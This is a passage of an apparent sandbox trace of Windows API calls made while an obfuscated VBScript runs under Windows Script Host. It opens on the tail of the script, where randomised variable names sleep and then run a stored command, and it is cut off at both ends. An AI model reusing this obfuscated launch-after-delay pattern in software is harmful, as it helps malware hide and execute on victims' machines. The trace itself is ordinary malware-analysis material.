R2qL4oI3mN2vD9iQ1sX7cY9oA0fK0hS7dL1w, 2 \r\nN9nY8xU9gT0oC0bB7aN5wT8qV8rR9bT6yV2iA5oO8eL7rF2jF6mY8zG3fG0i.Close \r\nSet nE= Nothing \r\nEnd If \r\nSet B8yU2nW4oD3lW4vO1xP2nY9oR3e = Nothing \r\nWScript.Sleep(5000) \r\nH2hA8cL7vV6cF1uZ5hR8wN6sP3aV6cG1c.run(R2qL4oI3mN2vD9iQ1sX7cY9oA0fK0hS7dL1w) \r\n") returned 1470
[0086.845] UnmapViewOfFile (lpBaseAddress=0x270000) returned 1
[0086.845] CloseHandle (hObject=0x120) returned 1
[0086.845] CloseHandle (hObject=0x11c) returned 1
[0086.845] GetSystemDirectoryA (in: lpBuffer=0x1af15b, uSize=0x0 | out: lpBuffer="") returned 0x14
[0086.845] GetSystemDirectoryA (in: lpBuffer=0x23080, uSize=0x15 | out: lpBuffer="C:\\Windows\\system32") returned 0x13
[0086.845] LoadLibraryA (lpLibFileName="C:\\Windows\\system32\\advapi32.dll") returned 0x76490000
[0086.846] GetProcAddress (hModule=0x76490000, lpProcName="SaferIdentifyLevel") returned 0x764b2102
[0086.846] GetProcAddress (hModule=0x76490000, lpProcName="SaferComputeTokenFromLevel") returned 0x764b3352
[0086.846] GetProcAddress (hModule=0x76490000, lpProcName="SaferCloseLevel") returned 0x764b3825
[0086.846] IdentifyCodeAuthzLevelW () returned 0x1
[0086.917] GetVersionExA (in: lpVersionInformation=0x1ae800*(dwOSVersionInfoSize=0x94, dwMajorVersion=0x2, dwMinorVersion=0x80, dwBuildNumber=0x77e4e026, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x1ae800*(dwOSVersionInfoSize=0x94, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1
[0086.917] GetUserDefaultLCID () returned 0x409
[0086.917] IsFileSupportedName () returned 0x1
[0086.917] _wcsicmp (_String1=".vbs", _String2=".vBS") returned 0
[0086.923] GetSignedDataMsg () returned 0x0
[0086.923] GetCurrentProcess () returned 0xffffffff
[0086.923] DuplicateHandle (in: hSourceProcessHandle=0xffffffff, hSourceHandle=0x120, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x1aed28, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x1aed28*=0x14c) returned 1
[0086.923] GetFileSize (in: hFile=0x14c, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0x5be
[0086.924] SetFilePointer (in: hFile=0x14c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0
[0086.924] ReadFile (in: hFile=0x14c, lpBuffer=0x2dec0, nNumberOfBytesToRead=0x5be, lpNumberOfBytesRead=0x1aecfc, lpOverlapped=0x0 | out: lpBuffer=0x2dec0*, lpNumberOfBytesRead=0x1aecfc*=0x5be, lpOverlapped=0x0) returned 1
[0086.924] CoInitialize (pvReserved=0x0) returned 0x1
[0086.924] CoCreateInstance (in: rclsid=0x74fa1e54*(Data1=0x6290bd1, Data2=0x48aa, Data3=0x11d2, Data4=([0]=0x84, [1]=0x32, [2]=0x0, [3]=0x60, [4]=0x8, [5]=0xc3, [6]=0xfb, [7]=0xfc)), pUnkOuter=0x0, dwClsContext=0x1, riid=0x74fa1d8c*(Data1=0xe4d1c9b0, Data2=0x46e8, Data3=0x11d4, Data4=([0]=0xa2, [1]=0xa6, [2]=0x0, [3]=0x10, [4]=0x4b, [5]=0xd3, [6]=0x50, [7]=0x90)), ppv=0x1aecd4 | out: ppv=0x1aecd4*=0x2e7e8) returned 0x0
[0086.929] __dllonexit () returned 0x74b81815
[0086.929] __dllonexit () returned 0x74b8182f
[0086.930] GetVersionExA (in: lpVersionInformation=0x1ad85c*(dwOSVersionInfoSize=0x94, dwMajorVersion=0x1ad84c, dwMinorVersion=0x2, dwBuildNumber=0x1b0000, dwPlatformId=0x74b84268, szCSDVersion="|Ø\x1a") | out: lpVersionInformation=0x1ad85c*(dwOSVersionInfoSize=0x94, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1
[0086.930] GetProcessWindowStation () returned 0x48
[0086.930] GetUserObjectInformationA (in: hObj=0x48, nIndex=1, pvInfo=0x1ad84c, nLength=0xc, lpnLengthNeeded=0x1ad858 | out: pvInfo=0x1ad84c, lpnLengthNeeded=0x1ad858) returned 1
[0086.930] DllGetClassObject (in: rclsid=0x418f38*(Data1=0x6290bd1, Data2=0x48aa, Data3=0x11d2, Data4=([0]=0x84, [1]=0x32, [2]=0x0, [3]=0x60, [4]=0x8, [5]=0xc3, [6]=0xfb, [7]=0xfc)), riid=0x75d3ee84*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x1adfc4 | out: ppv=0x1adfc4*=0x22a30) returned 0x0
[0086.931] IClassFactory:CreateInstance (in: This=0x22a30, pUnkOuter=0x0, riid=0x1ae970*(Data1=0xe4d1c9b0, Data2=0x46e8, Data3=0x11d4, Data4=([0]=0xa2, [1]=0xa6, [2]=0x0, [3]=0x10, [4]=0x4b, [5]=0xd3, [6]=0x50, [7]=0x90)), ppvObject=0x1adfb0 | out: ppvObject=0x1adfb0*=0x2e7e8) returned 0x0
[0086.931] GetSystemInfo (in: lpSystemInfo=0x1adef0 | out: lpSystemInfo=0x1adef0*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0xf, dwNumberOfProcessors=0x4, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03))
[0086.931] VirtualQuery (in: lpAddress=0x1adf30, lpBuffer=0x1adf14, dwLength=0x1c | out: lpBuffer=0x1adf14*(BaseAddress=0x1ad000, AllocationBase=0xb0000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
[0086.932] IUnknown:AddRef (This=0x2e7e8) returned 0x2
[0086.932] IUnknown:Release (This=0x2e7e8) returned 0x1
[0086.932] IUnknown:Release (This=0x22a30) returned 0x0
[0086.932] IUnknown:QueryInterface (in: This=0x2e7e8, riid=0x74fa1d8c*(Data1=0xe4d1c9b0, Data2=0x46e8, Data3=0x11d4, Data4=([0]=0xa2, [1]=0xa6, [2]=0x0, [3]=0x10, [4]=0x4b, [5]=0xd3, [6]=0x50, [7]=0x90)), ppvObject=0x1aeca4 | out: ppvObject=0x1aeca4*=0x2e7e8) returned 0x0
[0086.932] IUnknown:Release (This=0x2e7e8) returned 0x1
[0086.932] _strnicmp (_Str1="